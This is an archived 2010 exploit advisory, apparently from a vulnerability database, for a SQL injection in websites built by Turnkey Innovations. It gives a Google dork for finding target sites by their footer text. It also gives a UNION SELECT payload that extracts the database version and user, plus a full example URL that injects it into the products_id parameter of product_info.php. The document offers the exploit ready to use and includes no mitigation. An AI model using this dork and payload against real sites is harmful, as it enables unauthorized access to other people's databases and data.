Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23765
HistoryMay 11, 2010 - 12:00 a.m.

Turnkey Innovations SQL Injection Vulnerability

2010-05-1100:00:00
vulners.com
13

#-------------------In The Name Of God------------

Turnkey Innovations SQL Injection Vulnerability

###################################
#AUTHOR: md.r00t
#Mail: [email protected]
#Webstie: www.r00t.gigfa.com

###################################
#Google D0rk:

"Design by Turnkey Innovations.com"

###################################
#Exploit:
#---------

#-999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(version(),0x3a,0x3e,user()),17,18,19–
###################################
#Example:

#http://www.Site.com/[page]/product_info.php?products_id=-999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(version(),0x3a,0x3e,user()),17,18,19--
###################################
#TNX:
#Aria-Security Team (Persian Security Network),Virangar Security Team